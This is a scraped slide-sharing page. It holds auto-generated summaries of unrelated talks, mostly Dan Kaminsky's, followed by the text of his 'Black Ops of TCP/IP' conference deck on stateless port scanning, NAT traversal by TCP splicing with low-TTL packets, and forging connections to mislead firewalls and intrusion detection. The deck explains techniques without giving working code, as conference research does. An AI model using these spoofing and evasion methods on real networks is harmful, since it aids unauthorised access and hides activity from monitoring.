The document discusses the functions of the transport layer in the OSI model. It explains that the transport layer accepts data from the session layer, breaks it into packets and delivers them to the network layer. It is responsible for guaranteeing successful arrival of data at the destination and provides end-to-end communication between source and destination transport layers. The transport layer separates upper layers from low-level data transmission details and handles any data loss or damage. It can transmit packets in the same order or as isolated messages depending on the network and protocol.
Dan Kaminsky gave a keynote talk at DEFCON China thanking the organizers. He discussed how bugs are not random and connected concepts that may seem unrelated. He explained how 60 frames per second for video originated from 1890s power grid technology running at 60Hz for induction motors, and how the human brain also operates around this frequency range. Spectre and Meltdown CPU bugs occurred because security boundaries were based on assumptions that timing variations did not carry information, but they can be exploited to leak bits of data. Kaminsky argued that development and testing teams should be more integrated to avoid such issues through a more holistic "engineering" approach rather than distinguishing "forward" from "reverse".
This document provides a technical summary of Dan Kaminsky's keynote presentation. The keynote discusses three main topics:
1) Denial of service attacks and how Overflowd aims to make DDoS attacks less annoying by sharing netflow data between networks.
2) Cryptography and how JFE (Jump to Full Encryption) aims to automate TLS deployment to make encryption easier.
3) Data loss prevention and how Ratelock restricts data loss by enforcing rate limits and other policies at the serverless cloud layer to increase survivability even if complex parts are compromised.
The document discusses chickens and their properties. It covers chicken taxonomy, different types of chickens and their characteristics. It also references several papers on chickens and their behaviors.
Black Ops of TCP/IP 2011 (Black Hat USA 2011)Dan Kaminsky
The document summarizes vulnerabilities in TCP/IP protocols that can enable spoofing attacks and de-anonymization of Bitcoin transactions. It describes how:
1) UPNP vulnerabilities on home routers can expose nodes running Bitcoin clients to the public internet, allowing identification of IP addresses associated with transactions.
2) IP spoofing techniques can still bypass access control lists (ACLs) due to weaknesses in sequence number generation for TCP connections.
3) SYN cookies used to mitigate SYN floods have limited effectiveness and can be bypassed with a large number of connection attempts.
Showing How Security Has (And Hasn't) Improved, After Ten Years Of TryingDan Kaminsky
The document discusses the results of fuzz testing software from 2000-2010 to analyze how software security has improved over the last decade. The testing involved fuzzing four file formats (Office, PDF, etc.) across 18 programs from different years. This resulted in over 175,000 crashes. Analysis found over 900 unique bugs. Later versions had fewer exploitable bugs, indicating improving code quality. The results provide a potential "fuzzmark" metric for software security improvements, though comparisons across formats require more controls. The testing process and challenges ensuring data integrity are also outlined.
Domain Key Infrastructure (From Black Hat USA)Dan Kaminsky
This document provides a summary of Dan Kaminsky's talk introducing the Domain Key Infrastructure (DKI). The talk is aimed at users, buyers, builders, and breakers. Kaminsky explains that DKI will allow easy authentication across organizational boundaries now that DNSSEC has been deployed, securing email and other services. He demonstrates how to easily set up DNSSEC with the Phreebird server and shows it working end-to-end. Kaminsky argues that DNSSEC implementations have improved and various companies now aim to make it easy to deploy through managed services and "one click" devices.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
This document summarizes Dan Kaminsky's talk on rethinking web defense. Some key points:
1) Common web vulnerabilities like XSS and XSRF persist due to how difficult it is for developers to implement defenses like randomized tokens in a way that doesn't break other aspects of a site.
2) Web security solutions often ignore other engineering requirements around performance, compatibility, reliability and usability, making them difficult and expensive to implement.
3) Kaminsky argues the security community needs to develop defenses that meet all engineering requirements and don't break the web, rather than just criticizing developers. A secure session context could help prevent entire classes of vulnerabilities.
This document discusses vulnerabilities in the design of the Domain Name System (DNS) and how those vulnerabilities can be exploited. Specifically, it describes how DNS caches, proxies, and routes can be used to map DNS servers and inject content into caches. It also summarizes methods for tunneling arbitrary content through DNS using techniques like modifying Time-To-Live values and encoding data in domain names or record types. Finally, it discusses some approaches for suppressing DNS tunnels, such as flagging unusually large or formatted traffic.
This document discusses using audio visualization techniques to analyze audio files and detect patterns. It presents an approach called "dotplots" which compares chunks of audio data to find similarities. The document demonstrates a tool called "LudiVu" which uses dotplots to visualize similarities between sections of audio in real-time. It also discusses how dotplots could be useful for format identification, fuzzing guidance, and comparing versions of files and fuzzing operations. Overall, the document explores using dotplot visualization of audio as a way to analyze audio, detect repeated patterns, compare files, and potentially guide fuzzing activities.
Dan Kaminsky introduces the concept of DNS tunneling, which involves encoding and transmitting data within DNS queries and responses. He describes early implementations of DNS tunneling used to establish remote networking connections. Kaminsky then explores ways to increase bandwidth for DNS tunneling, such as encoding audio streams within DNS TXT records or distributing large files across many caching DNS servers in a technique called "DomainCast". Finally, he discusses modifying scanning tools to map the DNS landscape at large scales through stateless queries and analysis of responses.
This document discusses using OpenSSH to create secure tunnels through improbable networks. It covers:
1) Using SSH port forwarding to forward shells, commands, and ports between systems in a secure manner.
2) Implementing dynamic port forwarding with SOCKS to allow flexible connections.
3) Overcoming limitations of static port forwarding through techniques like SSH tunnels and proxy commands.
4) Creating secure remote access and inter-host connectivity even when systems are behind firewalls.
Weaknesses in authentication and encryption across many systems allowed significant security flaws to emerge in 2008, including issues with DNS, SSL, and SNMPv3. These flaws occurred because critical systems like DNS, which underlie authentication in many other areas, cannot reliably authenticate responses. Fixing these problems was challenging due to dependencies between systems and the complexity of coordinating updates. The speaker argues that securing DNS could help address authentication issues in linked systems by providing a secure, scalable place to publish cryptographic keys and other authentication data.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/how-axelera-ai-uses-digital-compute-in-memory-to-deliver-fast-and-energy-efficient-computer-vision-a-presentation-from-axelera-ai/
Bram Verhoef, Head of Machine Learning at Axelera AI, presents the “How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-efficient Computer Vision” tutorial at the May 2024 Embedded Vision Summit.
As artificial intelligence inference transitions from cloud environments to edge locations, computer vision applications achieve heightened responsiveness, reliability and privacy. This migration, however, introduces the challenge of operating within the stringent confines of resource constraints typical at the edge, including small form factors, low energy budgets and diminished memory and computational capacities. Axelera AI addresses these challenges through an innovative approach of performing digital computations within memory itself. This technique facilitates the realization of high-performance, energy-efficient and cost-effective computer vision capabilities at the thin and thick edge, extending the frontier of what is achievable with current technologies.
In this presentation, Verhoef unveils his company’s pioneering chip technology and demonstrates its capacity to deliver exceptional frames-per-second performance across a range of standard computer vision networks typical of applications in security, surveillance and the industrial sector. This shows that advanced computer vision can be accessible and efficient, even at the very edge of our technological ecosystem.
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor IvaniukFwdays
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Taking AI to the Next Level in Manufacturing.pdfssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
How information systems are built or acquired puts information, which is what they should be about, in a secondary place. Our language adapted accordingly, and we no longer talk about information systems but applications. Applications evolved in a way to break data into diverse fragments, tightly coupled with applications and expensive to integrate. The result is technical debt, which is re-paid by taking even bigger "loans", resulting in an ever-increasing technical debt. Software engineering and procurement practices work in sync with market forces to maintain this trend. This talk demonstrates how natural this situation is. The question is: can something be done to reverse the trend?
Essentials of Automations: Exploring Attributes & Automation ParametersSafe Software
Building automations in FME Flow can save time, money, and help businesses scale by eliminating data silos and providing data to stakeholders in real-time. One essential component to orchestrating complex automations is the use of attributes & automation parameters (both formerly known as “keys”). In fact, it’s unlikely you’ll ever build an Automation without using these components, but what exactly are they?
Attributes & automation parameters enable the automation author to pass data values from one automation component to the next. During this webinar, our FME Flow Specialists will cover leveraging the three types of these output attributes & parameters in FME Flow: Event, Custom, and Automation. As a bonus, they’ll also be making use of the Split-Merge Block functionality.
You’ll leave this webinar with a better understanding of how to maximize the potential of automations by making use of attributes & automation parameters, with the ultimate goal of setting your enterprise integration workflows up on autopilot.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
1. BLACK OPS OF
TCP/IPSpliced NAT2NAT And Other
Packet-Level Misadventures
Dan Kaminsky, CISSP
DoxPara Research
www.doxpara.com
2. Where I’m Coming From…
Black Hat / DefCon 0x7D1
Impossible Tunnels through Improbable Networks
with OpenSSH
Getting Out:
ProxyCommands for Non-TCP comm layers
HTTP, SOCKS, UDP, Packet Radio*, AIM/Yahoo*
Coming In:
Active Connection Brokering for NAT2NAT
One host exports SSHD to broker
Other host imports access from broker
Passing Through:
Dynamic Forwarding for Psuedo-VPN Work
Web Browsing, Dialpad(Split-H323), etc.
3. Interesting Problems
Instant Portscan
“Is it possible to discover instantaneously what network
services have been made available, even on massive
networks?”
Guerrila Multicast
“Is it possible to send a single packet to multiple
recipients, using today’s multicast-free Internet?”
“NATless NAT”
“Is it possible to share a globally addressable IP
address without translating private IP ranges a la NAT?”
Is it possible to allow incoming connections to an IP
multiplexed in this manner?
NAT Deadlock Resolution
“Is it possible to establish a TCP connection between
two hosts, both behind NATs?”
4. On Possibility
Restraint Free Engineering
“Abandon All Practicality, Ye Who Enter Here”
“It’s amazing what you can do once security is no
longer a concern.”
You’ve got what you’ve got. Make interesting
things happen.
It might end up practical.
It might end up secure.
Right now, it’s impossible. Fix that first.
Maybe.
5. On Packet Structure
Packets are “strangely ordered”
Where it’s ending up next, where it came from
recently, how it’s hopping from one place to the
next, how it’s hopping to its final destination,
checksum, where the packet came from originally,
where it’s going to end up, what app it came from,
what app it’s going to, checksum, god knows
what, ANOTHER checksum
Why not sort everything; put all the “came
from” and “going to’s” Why so much
redundancy? Isn’t it inefficient?
WHO CARES?
6. Layers: Not What, But Who
One medium, many messages
Listeners reconstruct meanings relevant to
themselves, ignore the rest
Managed (ir)responsibility
Fields are out of order, occasionally because
they’re addressed to different entities
Name and address repeated inside a business
letter and on the envelope
Messages at one layer can modulate
messages received at another
Insufficient postage will prevent a correctly
addressed letter from getting sent
Incorrect internal address has unknown effects
7. Error Recovery Per Layer
Layer 2 (Point to Point)
Errors are quickly recoverable, but error
generation can occur at same layer as layer
control
Data is destroyed and recreated each frame
Corporate Fertilizer
Layer 3 (Router to Router)
Many more sources of personally irrelevant error
Highest Traffic Link
Data is modulated – minimum change possible
Layer 4 (End to End)
Lowest traffic, highest personal relevance
Errors here actually matter
9. TCP Connection Traits: Flags
Connection Request (Alice -> Bob)
SYN: I want to talk to you
Connection Response (Bob -> Alice)
SYN|ACK: OK, lets talk.
RST|ACK: I ain’t listening
Connection Initiation (Alice -> Bob)
ACK: OK, beginning conversation.
10. TCP (and UDP)
Connection Traits: Ports
Local Port: What application requested the
connection. Usually a random number, 0-65535.
0 is a valid port
Remote Port: What application accepted the
connection. Usually a “known number”
80 for HTTP
143 for IMAP
443 for HTTP/SSL
IP handles who we’re talking to; Ports handle what
we want from them
11. TCP Connection Traits:
Sequences
Sequence Numbers
32 bit number, randomly generated, must
be reflected by the opposite party in a TCP
handshake
After initial reflection, used to relay
information about successful packet
acquisition
12. Connection Summary
Flag determines phase
Asymmetric
Port determines process
Sequence “secures session”
Prevents trivial spoofing attacks
Also used to manage connection speed,
identify which bytes are being
acknowledged
13. Stateless Pulse Scanning
Instant Portscan
“Is it possible to discover instantaneously what
network services have been made available, even
on massive networks?”
Answer: Yes, practically, even securely
Separate scanner and listener processes
Sending
Directly send n SYN packets
Same local port
SYN cookies
Receiving
Kernel filter packets arriving to local port
Record connection phase: Port up(SYN|ACK) or host
up, port down(RST|ACK)
14. Issue: Spoofed Responses
Easy to spoof hosts being up if the
scanner isn’t tracking who (or how it
scanned)
Solution: Invert SYN Cookies!
15. SYN Cookies
Developed in ’96, when SYN floods became
common
ACK reflects ACK# of SYN|ACK(incremented by
one)
Encrypts connection state into the SYN|ACK’s
ACK#
Therefore, you can use legitimate remote hosts –
instead of kernel memory – to store handshake
state
Ahhh…but SYN|ACK also reflects SEQ# of
SYN in its ACK#…
Instead of tracking SYN|ACK reflections in the
ACK, track SYN reflections in the SYN|ACK
16. Implementation: Scanrand 1.0
Element of: Paketto Keiretsu
384 lines of libnet and libpcap, w/ trivial
MD4 include
No state stored
Scans at ~11-20mbit
Possibly even portable
100% complete, release imminent
17.
18. Observed Results
Since no state is maintained within the
scanner, we can send SYNs at wire speed
Implementation can get faster
Found ~8300 web servers on a corporation’s
Class B
Time spent: ~4 Seconds
Collisions
Initial SYNs might collide, but SYN|ACKs resend
SYN|ACKs are given RSTs by present
kernels automatically
The SYNs were generated in userspace – the
kernel has no idea the connection request was
19. Implications
Userspace manipulation of packets can lead
to less overhead
Kernels are optimized to talk to other hosts, not
simply to scan them
Packet content can be overloaded
A random field can always be replaced with
encrypted data (and vice versa)
This is the heart of kleptography
Elegant solutions sometimes can be
reapplied elsewhere
SYN(really SYN|ACK) cookies made SYN
reception more efficient
Inverse SYN cookies make SYN transmission
20. Layer Redundancy
L2: Broadcast MAC Address
FF:FF:FF:FF:FF:FF
Absolute
L3: Broadcast IP Address
Last IP of Subnet
Relative
Sending to it is known as a Directed Broadcast
Often blocked, if it can be detected
Detection can be…suppressed.
21. Broadcast GHosts
Guerrila Multicast
“Is it possible to send a single packet to multiple
recipients, using today’s multicast-free Internet?”
Answer: Yes, barely.
Link a unicast IP to a broadcast MAC
address; all responses to that IP will be
broadcast throughout a subnet
No individual client need duplicate the datastream
– the switch will issue copies of the data to all
downstream hosts
22. IP Incorporated
DHCP for an IP
May or may not use broadcast MAC in DHCP
request – just trying to validate that nobody else is
using the IP
Answer ARP requests for that IP with
Broadcast MAC (or Multicast MAC)
At L2, w/o IGMP Snooping working, Multicast =
Broadcast
Issue L4 requests against a remote host,
unicasted via layer 3, with responses
broadcasted locally at layer 2
Elegance has left the building
23. Firewall Issues
NAT
100% NAT penetration, as long as the
implementation doesn’t refuse to NAT for a
broadcast MAC
PIX, which accepts…Multicast MACs!
Multicast through NAT!
UDP
Remote side can send data forever – as long as it
keeps packets coming in before the UDP state
expires, no further data is required from behind the
wall
24. TCP w/ Guerrila Multicast
Without any listeners, stream dies
With one listener, stream can operate
normally
With many listeners, only one should
participate in acknowledging the stream
If that one dies, another should take its place
Solution: Random delays
On reception of a packet to be acknowledged,
queue a response within the next 50-1500ms
Broadcast response
If another host broadcasted a response before you
had the chance to, unschedule your response
25. Recontextualizing L2/L3
One IP, normally linked to one host, can be
transformed at L2 into all hosts at a given
subnet
This transformation is undetectable outside the
subnet
Other Uses
“All hosts” could also include “Many hosts” using
L2 Multicast packets
Do we have another other situation where one IP
“stands in” for many hosts?
26. NAT: Splitting IPs For Fun
and Profit
NAT multiplexes several hosts into one IP
address by splitting on local port
Already munging IP, might as well munge ports
too
Some implementations make best efforts to match
local port inside the network w/ local port outside
Birthday Paradox: Collision chance = 1 /
sqrt(range_of_local_ports) = 1/256
If we can always match IP and Port, then we
can always maintain end-to-end correctness
Only have a problem 1/256 connections to the
same host
Alternate strategies exist – munge the SEQ#(problems
w/ Window overlap), MTU decrement, TIMESTAMPS
27. MAC Address Translation
“NATless NAT”
“Is it possible to share a globally addressable IP
address without translating private IP ranges a la
NAT?”
Is it possible to allow incoming connections to an
IP multiplexed in this manner?
Answer: Yes. Oh yes.
NAT: L4->L3
ARP: L3->L2
MAT: L4->(L3,L2)
Multiplex with L2/L3 instead of just L3
Make ARP Table dynamic, based on each individual L4
connection
Maintains L3 end-to-end integrity
28. Implementation: AllNewt 1.0
“All New Translation Engine”
Another part of Paketto Keiretsu
Translates arbitrary local IP addresses into
globally routable IP addresses
Instead of just storing IP_SRC, stores IP_SRC,
ETHER_DHOST, and ETHER_SHOST
If IP_SRC == External IP, packets will retain end-
to-end integrity
If IP_SRC == RFC1918 IP, packets will be NATted
normally
If IP_SRC == Yahoo/Microsoft/Whatever, packets
will be NATted a little less normally
Multiple hosts can share the same IP address, if
29. Pizza Protocol A La Mode
“Anyone order a pizza?”
Stateless approach: Ask everybody, drop
RST|ACK, forward everything else.
Just broadcast to the IP
Actually works behind NATs, but you need to
catalog all the local IPs
Drop all RSTs, pass all streams/ACKs
Breaks down when two people are listening on the
same port
Can split port range(1022, 2022, 3022, etc. all being
different instances of 22/ssh)
Apply host-level heuristics – priority for incoming
selection based on outgoing sessions
30. Incoming State
Stateful Approach (“you ordered the last one”)
Ask everyone, but remember who’s hosting
Send to the first host that replies
Increment the timer every time a packet is emitted
from the serving host for that port
If no packets are emitted after a certain amount of
time, allow open registration once more
“It’s amazing what you can do once security
is not an issue.”
31. TCP Splicing
NAT Deadlock Resolution
“Is it possible to establish a TCP connection
between two hosts, both behind NATs?”
Answer: Yes…but it ain’t pretty.
Convince each firewall that the other accepted the
connection
Layers will need to be played against eachother to
prevent certain otherwise desirable messaging behaviors
from going too far
32. An Analogy
Bill Gates ‘n Larry Ellison
Why? They can call anyone they want –
their secretaries won’t stop ‘em.
None of us can call them – their
secretaries will stop us.
If Bill or Larry did call us, they’d actually be
able to hear us reply.
Asymmetry is in the initiation
33. Setting Up
Alice and Bob both behind NATting
firewalls
Firewalls authorize all outgoing sessions,
block all incoming sessions
Block w/ state – no faking
Only accept fully validated responses to
outgoing messages
Ports must match
SEQ#’s must match
Total outgoing trust, zero incoming trust
34. The Attempt
Alice tries to send a message to Bob
SYN hits Alice’s firewall, is given global IP + entry
in state table “connection attempted”
SYN travels across Internet
SYN hits Bob’s firewall, RST|ACK sent
RST|ACK hits Alice’s firewall, entry in state table
torn down, RST|ACK readdressed to Alice
Alice gets nowhere
Bob does the same thing
35. Analysis
Good
Entry in firewall state table, awaiting a reply
Bad
Negative reply, entry in state table
destroyed
Can we get the former without the
latter?
36. Doomed TTLs
Packet first hits local firewall, gets NAT entry,
travels across Internet, hits remote firewall,
gets shot down.
Good stuff closer to us, bad stuff farther away
TTL: Time To Live – SET TO ~4
Maximum number of hops packet is allowed to
travel along the network before being dropped
Used by IP to prevent routing loops
Used by us to prevent state table from closing the
hole
Alice SYNs w/ Doomed TTL
Bob SYNs w/ Doomed TTL
Both firewalls have a hole open for eachother
37. Packets, Ports, Problems
Three way handshake – SYN, SYN|ACK,
ACK
Outgoing connections have SYNs and ACKs but
no SYN|ACKs
Ports
Need to agree on which ports are linking up
Need to discover firewall multiplexing rules
Timing
Need to know when to attempt connection
Solution to all three: Handshake Only
Connection Broker
Involved only in setting up connection
38. The Other Shoe Drops
Now you add a connection broker
HANDSHAKE ONLY.
Sends the SYN|ACK Host/Port/SEQ#
combination “virtually added” to firewall
packet acceptance rules
Larry Ellison: “Bill Gates is going to call here in
the next two minutes, please put his call through.”
Need to generate packets, though
39. Local Port Strategies
Some firewalls do best effort to match
Some increment from a fixed counter
Some use random local ports
Entropy cannot be differentiated – rule
from kleptography
As long as it’s translated back…
Need to discover what strategy is being
used
40. Full Broker Discovery
Alice and Bob SYN Charlie 2x
Charlie NFO Alice and Bob
Alice and Bob SYN Charlie
Alice and Bob DoomSYN Bob and Alice
Alice and Bob SYN Charlie
Charlie SYN|ACK Alice and Bob
Throw details about port selection in IPID
Alice and Bob DoomACK Bob and Alice
Alice and Bob begin normal TCP session to
eachother, as if the other acknowledged
correctly
41. Much easier strategies
Source route through connection broker, drop
the route once the connection goes live
UDP NAT2NAT
Works all over the place in games
UDP is symmetrical – just spew packets at
eachother with opposite local port / source port,
and eventually the state system will assume the
other’s outgoing packet is a response to its own
outgoing packet
You can run TCP over UDP
Far less fun though
42. TTL-Based Firewall Analysis
Emit a SYN with a low TTL
SYN spawns ICMP error, hits local
firewall, which rewrites IP header and
forwards to local host
Firewall doesn’t rewrite ICMP data
Original outgoing header
Can discover how firewall is munging
our datastream
43. State of Disarray
State Management
State = Buffers
Buffers need to be searched
Buffers need to be allocated
Buffers need to be overflown
If your name is Gobbles
NAT normally needs to be stateful
A packet comes in, and given the Source IP, the
Source Port, and the Destination Port, we check
our tables to rewrite on the internal interface the
Destination IP(not firewall) and maybe the
destination port too
The MAC address is always rewritten, but with MAT we
44. Stateless NAT: Possible?
State is all about things we have to remember
Stateless scanning is about extracting what we
need from what we get back
“Can we embed the NAT state in every
outgoing IP packet such that every response
received will contain the full NAT state”?
Answer: Yup. (Thanks, Spence.)
IP Timestamps Mode 3
IP Option against each host along the route. Up to four 4
byte IP addresses are specified, with space for up to four
4 byte timestamps to be added
If IP in the timestamp request matches IP of the router,
the router replaces the timestamp with its own
If IP doesn’t match, pass along the timestamps of others
45. Abusing IP Timestamps
Insert timestamps from invalid IP’s containing
not actual timestamps but NAT state
Encrypt NAT state so it may not be modified
en route
Decrypt NAT state upon packet return
Problems
Need to insert IP options – may overflow packet,
may need to fragment, etc.
IP options are sometimes blocked by firewalls
Damn source routers ;-)
Possibilities with TCP Timestamps too
Reply field contains 32 bits of user specified stamp
46. Tricking Firewalls/IDSs
Alice can forge a connection from an arbitrary
IP by cooperating with Charlie
Alice looks like she’s connecting to Yahoo, but is
informing Charlie of the specifics of the connection
attempt
Charlie replies as if he was Yahoo, and begins a
TCP stream of arbitrary data to Alice from “Yahoo”
Alice acknowledges all data to “Yahoo” with the
doomed TTL – we continue low TTL count through
the data stream
Really messy in terms of ICMP time
exceeded messages, BUT logging systems
might drop these messages